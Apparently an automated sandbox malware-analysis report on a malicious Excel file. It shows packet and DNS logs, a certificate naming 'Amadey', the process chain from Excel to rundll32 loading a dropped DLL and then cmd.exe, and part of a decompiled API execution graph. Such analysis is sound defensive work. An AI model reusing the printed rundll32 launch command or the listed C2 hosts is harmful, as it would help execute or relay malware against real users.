                                                    Apr 7, 2021 18:48:07.067276001 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.067285061 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067291975 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067296028 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067300081 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067313910 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.067320108 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067375898 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067387104 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067433119 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.067465067 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.067507982 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.067579031 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.107276917 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.107333899 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.107386112 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.107409000 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.107460976 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.107466936 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.107970953 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108067989 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108114004 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108119965 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108155966 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108195066 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108198881 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108233929 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108238935 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108278990 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108283043 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108328104 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108330965 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108366013 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108371019 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108405113 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108409882 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108444929 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108448029 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108483076 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108485937 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108522892 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108526945 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108562946 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108577967 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108608007 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108612061 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108654022 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108655930 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108695984 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.108696938 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.108738899 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.134303093 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.134416103 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.144134998 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.144191027 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.144231081 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.144241095 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.144264936 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.144273043 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.144313097 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.144315958 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.144350052 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.144356012 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.144401073 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.146138906 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.146194935 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.146214962 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.146239042 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.151808977 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.151840925 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.151890039 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.153412104 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.186525106 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.186582088 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.186623096 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.186964989 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:07.195292950 CEST4434917252.12.4.186192.168.2.22
                                                    Apr 7, 2021 18:48:07.195374966 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:34.903301954 CEST49170443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:48:34.903722048 CEST49172443192.168.2.2252.12.4.186
                                                    Apr 7, 2021 18:49:18.273797035 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:49:18.367003918 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:49:18.367166042 CEST49167443192.168.2.22104.21.3.47

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 7, 2021 18:47:18.337178946 CEST5219753192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:18.366961956 CEST53521978.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:52.051546097 CEST5309953192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:52.065507889 CEST53530998.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:52.069269896 CEST5283853192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:52.082361937 CEST53528388.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:53.861712933 CEST6120053192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:53.875118971 CEST53612008.8.8.8192.168.2.22
                                                    Apr 7, 2021 18:47:53.881526947 CEST4954853192.168.2.228.8.8.8
                                                    Apr 7, 2021 18:47:53.900218964 CEST53495488.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Apr 7, 2021 18:47:18.337178946 CEST192.168.2.228.8.8.80x15d4Standard query (0)whiskyexpanse.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Apr 7, 2021 18:47:18.366961956 CEST8.8.8.8192.168.2.220x15d4No error (0)whiskyexpanse.com104.21.3.47A (IP address)IN (0x0001)
                                                    Apr 7, 2021 18:47:18.366961956 CEST8.8.8.8192.168.2.220x15d4No error (0)whiskyexpanse.com172.67.130.61A (IP address)IN (0x0001)

                                                    HTTPS Packets

                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                    Apr 7, 2021 18:47:18.575788021 CEST104.21.3.47443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Mar 16 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Mar 16 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                    Apr 7, 2021 18:47:53.102804899 CEST52.12.4.186443192.168.2.2249170CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATCN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=ATWed Apr 07 09:39:35 CEST 2021Thu Apr 07 09:39:35 CEST 2022771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: EXCEL.EXE PID: 2004 Parent PID: 584

                                                    General

                                                    Start time:18:46:40
                                                    Start date:07/04/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                    Imagebase:0x13f6f0000
                                                    File size:27641504 bytes
                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 2536 Parent PID: 2004

                                                    General

                                                    Start time:18:46:45
                                                    Start date:07/04/2021
                                                    Path:C:\Windows\System32\rundll32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:rundll32 ..\ndgfht.frg,PluginInit
                                                    Imagebase:0xff8a0000
                                                    File size:45568 bytes
                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: rundll32.exe PID: 1108 Parent PID: 2536

                                                    General

                                                    Start time:18:46:45
                                                    Start date:07/04/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:rundll32 ..\ndgfht.frg,PluginInit
                                                    Imagebase:0xe40000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 3032 Parent PID: 1108

                                                    General

                                                    Start time:18:47:32
                                                    Start date:07/04/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):
                                                    Commandline:C:\Windows\System32\cmd.exe
                                                    Imagebase:
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: rundll32.exe PID: 1108 Parent PID: 2536 rundll32.exeCOMMON

                                                      Execution Graph

                                                      Execution Coverage:5%
                                                      Dynamic/Decrypted Code Coverage:79.7%
                                                      Signature Coverage:1.4%
                                                      Total number of Nodes:1639
                                                      Total number of Limit Nodes:64

                                                      Graph

                                                      execution_graph 44839 6e77ca37 44850 6e78016c 44839->44850 44846 6e77ca5f 44869 6e77d646 14 API calls _free 44846->44869 44847 6e77ca83 44849 6e77ca54 44870 6e77d646 14 API calls _free 44849->44870 44851 6e77ca49 44850->44851 44852 6e780175 44850->44852 44856 6e780623 GetEnvironmentStringsW 44851->44856 44871 6e77ef95 44852->44871 44857 6e78063a 44856->44857 44858 6e780690 44856->44858 45091 6e78053f WideCharToMultiByte 44857->45091 44859 6e780699 FreeEnvironmentStringsW 44858->44859 44860 6e77ca4e 44858->44860 44859->44860 44860->44849 44868 6e77ca89 25 API calls 3 library calls 44860->44868 44862 6e780653 44862->44858 44863 6e77e9c4 15 API calls 44862->44863 44864 6e780663 44863->44864 44865 6e78067b 44864->44865 45092 6e78053f WideCharToMultiByte 44864->45092 45093 6e77d646 14 API calls _free 44865->45093 44868->44846 44869->44849 44870->44847 44872 6e77efa0 44871->44872 44873 6e77efa6 44871->44873 44915 6e77d8f5 6 API calls _unexpected 44872->44915 44895 6e77efac 44873->44895 44916 6e77d934 6 API calls _unexpected 44873->44916 44876 6e77efc0 44876->44895 44917 6e77d5e9 44876->44917 44881 6e77efed 44926 6e77d934 6 API calls _unexpected 44881->44926 44882 6e77efd8 44924 6e77d934 6 API calls _unexpected 44882->44924 44883 6e77f025 44896 6e77ffb3 44883->44896 44886 6e77eff9 44887 6e77effd 44886->44887 44888 6e77f00c 44886->44888 44927 6e77d934 6 API calls _unexpected 44887->44927 44928 6e77ecda 14 API calls _unexpected 44888->44928 44892 6e77f017 44929 6e77d646 14 API calls _free 44892->44929 44893 6e77efe4 44925 6e77d646 14 API calls _free 44893->44925 44895->44883 44930 6e77d1ae 37 API calls __InternalCxxFrameHandler 44895->44930 44933 6e7800cc 44896->44933 44901 6e77ffdf 44901->44851 44907 6e780030 44907->44851 44908 6e78001d 44971 6e77d59b 14 API calls _free 44908->44971 44910 6e780064 44914 6e780022 44910->44914 44974 6e77fc4e 25 API calls 2 library calls 44910->44974 44911 6e780038 44911->44910 44973 6e77d646 14 API calls _free 44911->44973 44972 6e77d646 14 API calls _free 44914->44972 44915->44873 44916->44876 44922 6e77d5f6 _unexpected 44917->44922 44918 6e77d636 44932 6e77d59b 14 API calls _free 44918->44932 44919 6e77d621 RtlAllocateHeap 44921 6e77d634 44919->44921 44919->44922 44921->44881 44921->44882 44922->44918 44922->44919 44931 6e7807d7 EnterCriticalSection LeaveCriticalSection _unexpected 44922->44931 44924->44893 44925->44895 44926->44886 44927->44893 44928->44892 44929->44895 44931->44922 44932->44921 44934 6e7800d8 ___scrt_is_nonwritable_in_current_image 44933->44934 44936 6e7800f2 44934->44936 44975 6e77ddd2 EnterCriticalSection 44934->44975 44938 6e77ffc6 44936->44938 44978 6e77d1ae 37 API calls __InternalCxxFrameHandler 44936->44978 44937 6e780102 44943 6e78012e 44937->44943 44976 6e77d646 14 API calls _free 44937->44976 44944 6e77fd5c 44938->44944 44977 6e78014b LeaveCriticalSection __InternalCxxFrameHandler 44943->44977 44979 6e77bd8f 44944->44979 44947 6e77fd8f 44949 6e77fda6 44947->44949 44950 6e77fd94 GetACP 44947->44950 44948 6e77fd7d GetOEMCP 44948->44949 44949->44901 44951 6e77e9c4 44949->44951 44950->44949 44952 6e77ea02 44951->44952 44953 6e77e9d2 44951->44953 44991 6e77d59b 14 API calls _free 44952->44991 44955 6e77e9ed HeapAlloc 44953->44955 44958 6e77e9d6 _unexpected 44953->44958 44957 6e77ea00 44955->44957 44955->44958 44956 6e77ea07 44956->44914 44960 6e7801c7 44956->44960 44957->44956 44958->44952 44958->44955 44990 6e7807d7 EnterCriticalSection LeaveCriticalSection _unexpected 44958->44990 44961 6e77fd5c 39 API calls 44960->44961 44962 6e7801e7 44961->44962 44963 6e780221 IsValidCodePage 44962->44963 44969 6e78025d __InternalCxxFrameHandler 44962->44969 44965 6e780233 44963->44965 44963->44969 44967 6e780262 GetCPInfo 44965->44967 44970 6e78023c __InternalCxxFrameHandler 44965->44970 44966 6e780015 44966->44908 44966->44911 44967->44969 44967->44970 44969->44969 45003 6e778727 44969->45003 44992 6e77fe32 44970->44992 44971->44914 44972->44907 44973->44910 44974->44914 44975->44937 44976->44943 44977->44936 44980 6e77bda6 44979->44980 44981 6e77bdaf 44979->44981 44980->44947 44980->44948 44981->44980 44987 6e77eed8 37 API calls 3 library calls 44981->44987 44983 6e77bdcf 44988 6e77f12a 37 API calls __fassign 44983->44988 44985 6e77bde5 44989 6e77f157 37 API calls __fassign 44985->44989 44987->44983 44988->44985 44989->44980 44990->44958 44991->44956 44993 6e77fe5a GetCPInfo 44992->44993 45002 6e77ff23 44992->45002 44999 6e77fe72 44993->44999 44993->45002 44994 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 44996 6e77ffb1 44994->44996 44996->44969 45010 6e78192a 44999->45010 45001 6e78226e 41 API calls 45001->45002 45002->44994 45004 6e778732 IsProcessorFeaturePresent 45003->45004 45005 6e778730 45003->45005 45007 6e778ffb 45004->45007 45005->44966 45090 6e778fbe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45007->45090 45009 6e7790de 45009->44966 45011 6e77bd8f __fassign 37 API calls 45010->45011 45012 6e78194a 45011->45012 45030 6e7804c3 45012->45030 45014 6e781977 45016 6e78199d __InternalCxxFrameHandler 45014->45016 45017 6e77e9c4 15 API calls 45014->45017 45021 6e781a08 45014->45021 45015 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 45018 6e77feda 45015->45018 45019 6e781a02 45016->45019 45022 6e7804c3 __fassign MultiByteToWideChar 45016->45022 45017->45016 45025 6e78226e 45018->45025 45033 6e781a2d 14 API calls _free 45019->45033 45021->45015 45023 6e7819eb 45022->45023 45023->45019 45024 6e7819f2 GetStringTypeW 45023->45024 45024->45019 45026 6e77bd8f __fassign 37 API calls 45025->45026 45027 6e782281 45026->45027 45034 6e782084 45027->45034 45031 6e7804d4 MultiByteToWideChar 45030->45031 45031->45014 45033->45021 45035 6e78209f 45034->45035 45036 6e7804c3 __fassign MultiByteToWideChar 45035->45036 45039 6e7820e3 45036->45039 45037 6e782248 45038 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 45037->45038 45040 6e77fefb 45038->45040 45039->45037 45041 6e77e9c4 15 API calls 45039->45041 45045 6e782108 45039->45045 45040->45001 45041->45045 45042 6e7804c3 __fassign MultiByteToWideChar 45043 6e78214e 45042->45043 45056 6e7821ad 45043->45056 45062 6e77d9c1 45043->45062 45045->45042 45045->45056 45048 6e7821bc 45050 6e77e9c4 15 API calls 45048->45050 45054 6e7821ce 45048->45054 45049 6e782184 45051 6e77d9c1 6 API calls 45049->45051 45049->45056 45050->45054 45051->45056 45052 6e782239 45069 6e781a2d 14 API calls _free 45052->45069 45054->45052 45055 6e77d9c1 6 API calls 45054->45055 45057 6e782216 45055->45057 45070 6e781a2d 14 API calls _free 45056->45070 45057->45052 45068 6e78053f WideCharToMultiByte 45057->45068 45059 6e782230 45059->45052 45060 6e782265 45059->45060 45071 6e781a2d 14 API calls _free 45060->45071 45072 6e77d69a 45062->45072 45066 6e77da12 LCMapStringW 45067 6e77d9d2 45066->45067 45067->45048 45067->45049 45067->45056 45068->45059 45069->45056 45070->45037 45071->45056 45076 6e77d795 45072->45076 45075 6e77da1e LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 45075->45066 45077 6e77d6b0 45076->45077 45078 6e77d7c3 45076->45078 45077->45067 45077->45075 45078->45077 45083 6e77d6ce 45078->45083 45081 6e77d7dd GetProcAddress 45081->45077 45082 6e77d7ed _unexpected 45081->45082 45082->45077 45088 6e77d6df ___vcrt_FlsFree 45083->45088 45084 6e77d78a 45084->45077 45084->45081 45085 6e77d6fd LoadLibraryExW 45086 6e77d718 GetLastError 45085->45086 45085->45088 45086->45088 45087 6e77d773 FreeLibrary 45087->45088 45088->45084 45088->45085 45088->45087 45089 6e77d74b LoadLibraryExW 45088->45089 45089->45088 45090->45009 45091->44862 45092->44865 45093->44858 45094 6e7bd3da 45103 6e7eb048 45094->45103 45096 6e7bd3e6 45124 6e7bd209 19 API calls 2 library calls 45096->45124 45098 6e7bd3fe 45099 6e7bd40e 45098->45099 45100 6e7eb048 std::_Locinfo::_Locinfo_ctor 72 API calls 45098->45100 45125 6e7bd209 19 API calls 2 library calls 45099->45125 45100->45099 45102 6e7bd422 45104 6e7eb054 ___unDNameEx 45103->45104 45126 6e7eafab 45104->45126 45106 6e7eb060 45108 6e7eb068 __fread_nolock 45106->45108 45164 6e7f7d21 GetLastError 45106->45164 45108->45096 45109 6e7eb074 45184 6e800229 40 API calls 2 library calls 45109->45184 45114 6e7eb099 45114->45108 45115 6e7eb10c 45114->45115 45117 6e7eb0fc 45114->45117 45185 6e7e951d IsProcessorFeaturePresent 45114->45185 45189 6e7f99f0 45114->45189 45196 6e800229 40 API calls 2 library calls 45114->45196 45203 6e7e9a62 RtlEnterCriticalSection 45115->45203 45117->45115 45118 6e7eb100 45117->45118 45197 6e7f99b6 45118->45197 45119 6e7eb116 45121 6e7f99b6 _free 18 API calls 45119->45121 45122 6e7eb139 45119->45122 45121->45122 45122->45108 45123 6e7f99b6 _free 18 API calls 45122->45123 45123->45108 45124->45098 45125->45102 45127 6e7eafb7 45126->45127 45128 6e7eafc5 45126->45128 45204 6e7f8b43 45127->45204 45216 6e7fff46 45128->45216 45131 6e7eafc1 45131->45106 45133 6e7eb01f 45135 6e7e951d std::_Locinfo::_W_Getmonths 10 API calls 45133->45135 45141 6e7eb047 ___unDNameEx 45135->45141 45137 6e7eb02a 45139 6e7f99b6 _free 18 API calls 45137->45139 45138 6e7fff46 __cftoe 39 API calls 45140 6e7eb00e 45138->45140 45139->45131 45142 6e7eb015 45140->45142 45143 6e7eb021 45140->45143 45144 6e7eafab std::_Locinfo::_Locinfo_ctor 72 API calls 45141->45144 45142->45133 45142->45137 45145 6e7f8b43 std::_Locinfo::_Locinfo_ctor 63 API calls 45143->45145 45146 6e7eb060 45144->45146 45145->45137 45147 6e7f7d21 numpunct 35 API calls 45146->45147 45149 6e7eb068 __fread_nolock 45146->45149 45148 6e7eb074 45147->45148 45226 6e800229 40 API calls 2 library calls 45148->45226 45149->45106 45151 6e7f99f0 _strftime 19 API calls 45154 6e7eb099 45151->45154 45152 6e7e951d std::_Locinfo::_W_Getmonths 10 API calls 45152->45154 45154->45149 45154->45151 45154->45152 45155 6e7eb10c 45154->45155 45158 6e7eb0fc 45154->45158 45227 6e800229 40 API calls 2 library calls 45154->45227 45228 6e7e9a62 RtlEnterCriticalSection 45155->45228 45157 6e7eb116 45161 6e7f99b6 _free 18 API calls 45157->45161 45162 6e7eb139 45157->45162 45158->45155 45159 6e7eb100 45158->45159 45160 6e7f99b6 _free 18 API calls 45159->45160 45160->45149 45161->45162 45162->45149 45163 6e7f99b6 _free 18 API calls 45162->45163 45163->45149 45165 6e7f7d37 45164->45165 45168 6e7f7d3d 45164->45168 45401 6e7fc700 9 API calls 2 library calls 45165->45401 45167 6e7f9456 numpunct 18 API calls 45169 6e7f7d4f 45167->45169 45168->45167 45170 6e7f7d8c SetLastError 45168->45170 45171 6e7f7d57 45169->45171 45402 6e7fc756 9 API calls 2 library calls 45169->45402 45170->45109 45173 6e7f99b6 _free 18 API calls 45171->45173 45175 6e7f7d5d 45173->45175 45174 6e7f7d6c 45174->45171 45176 6e7f7d73 45174->45176 45178 6e7f7d98 SetLastError 45175->45178 45403 6e7f7a61 18 API calls numpunct 45176->45403 45404 6e7eb3a9 35 API calls _abort 45178->45404 45179 6e7f7d7e 45181 6e7f99b6 _free 18 API calls 45179->45181 45183 6e7f7d85 45181->45183 45182 6e7f7da4 45183->45170 45183->45178 45184->45114 45186 6e7e9528 45185->45186 45405 6e7e9302 45186->45405 45190 6e7f9a2e 45189->45190 45194 6e7f99fe _strftime 45189->45194 45412 6e7eb2cd 18 API calls __dosmaperr 45190->45412 45191 6e7f9a19 RtlAllocateHeap 45193 6e7f9a2c 45191->45193 45191->45194 45193->45114 45194->45190 45194->45191 45411 6e7f4908 6 API calls 2 library calls 45194->45411 45196->45114 45198 6e7f99ea _free 45197->45198 45199 6e7f99c1 HeapFree 45197->45199 45198->45108 45199->45198 45200 6e7f99d6 45199->45200 45413 6e7eb2cd 18 API calls __dosmaperr 45200->45413 45202 6e7f99dc GetLastError 45202->45198 45203->45119 45205 6e7f8b6d 45204->45205 45206 6e7f8b59 45204->45206 45208 6e7f7d21 numpunct 35 API calls 45205->45208 45245 6e7eb2cd 18 API calls __dosmaperr 45206->45245 45210 6e7f8b72 45208->45210 45209 6e7f8b5e 45246 6e7e94f0 24 API calls __get_errno 45209->45246 45229 6e804ea9 45210->45229 45213 6e7f8b69 45213->45131 45214 6e7f8b7a 45241 6e7f7ed6 45214->45241 45361 6e7ffe39 45216->45361 45219 6e7f9456 45220 6e7f9463 _strftime 45219->45220 45221 6e7f94a3 45220->45221 45222 6e7f948e RtlAllocateHeap 45220->45222 45399 6e7f4908 6 API calls 2 library calls 45220->45399 45400 6e7eb2cd 18 API calls __dosmaperr 45221->45400 45222->45220 45224 6e7eaff7 45222->45224 45224->45137 45224->45138 45226->45154 45227->45154 45228->45157 45230 6e804eb5 ___unDNameEx 45229->45230 45231 6e7f7d21 numpunct 35 API calls 45230->45231 45232 6e804ebe 45231->45232 45233 6e804f0c __fread_nolock 45232->45233 45247 6e7e9a62 RtlEnterCriticalSection 45232->45247 45233->45214 45235 6e804edc 45248 6e804f20 18 API calls numpunct 45235->45248 45237 6e804ef0 45249 6e804f0f RtlLeaveCriticalSection std::_Lockit::~_Lockit 45237->45249 45239 6e804f03 45239->45233 45250 6e7eb3a9 35 API calls _abort 45239->45250 45242 6e7f7ee2 ___unDNameEx 45241->45242 45251 6e7f8087 45242->45251 45244 6e7f7eee __fread_nolock std::_Locinfo::_Locinfo_ctor 45244->45213 45245->45209 45246->45213 45247->45235 45248->45237 45249->45239 45250->45233 45252 6e7f9456 numpunct 18 API calls 45251->45252 45253 6e7f809f 45252->45253 45254 6e7f99b6 _free 18 API calls 45253->45254 45255 6e7f80ac 45254->45255 45256 6e7f80db 45255->45256 45258 6e7f8036 45255->45258 45256->45244 45261 6e7f7f5b 45258->45261 45260 6e7f805a 45260->45256 45262 6e7f7f67 ___unDNameEx 45261->45262 45269 6e7e9a62 RtlEnterCriticalSection 45262->45269 45264 6e7f7f71 45270 6e7f80ee 45264->45270 45266 6e7f7f7e 45282 6e7f7f92 RtlLeaveCriticalSection std::_Lockit::~_Lockit 45266->45282 45268 6e7f7f8a __fread_nolock 45268->45260 45269->45264 45271 6e7f8104 std::_Locinfo::_Locinfo_ctor 45270->45271 45283 6e7f8d5c 45271->45283 45274 6e7f81d6 numpunct 45306 6e804c5c 18 API calls 3 library calls 45274->45306 45277 6e7f81e8 45277->45266 45278 6e7f8127 45304 6e804f20 18 API calls numpunct 45278->45304 45279 6e7f8181 numpunct 45279->45277 45305 6e804f20 18 API calls numpunct 45279->45305 45281 6e7f81b1 45281->45266 45282->45268 45284 6e7f8d87 45283->45284 45291 6e7f8da8 45283->45291 45285 6e7f8d93 45284->45285 45349 6e7f9041 63 API calls 9 library calls 45284->45349 45354 6e7d3a8f 45285->45354 45286 6e7f8f27 45286->45285 45307 6e7f8bc3 45286->45307 45289 6e7f8f35 45352 6e7f854f 63 API calls 9 library calls 45289->45352 45291->45286 45291->45289 45297 6e7f8dea std::_Locinfo::_Locinfo_ctor try_get_first_available_module 45291->45297 45293 6e7f8117 45293->45274 45293->45278 45294 6e7f8f51 45294->45285 45294->45286 45353 6e7f9041 63 API calls 9 library calls 45294->45353 45297->45285 45297->45286 45298 6e7f9034 45297->45298 45299 6e7f902f 45297->45299 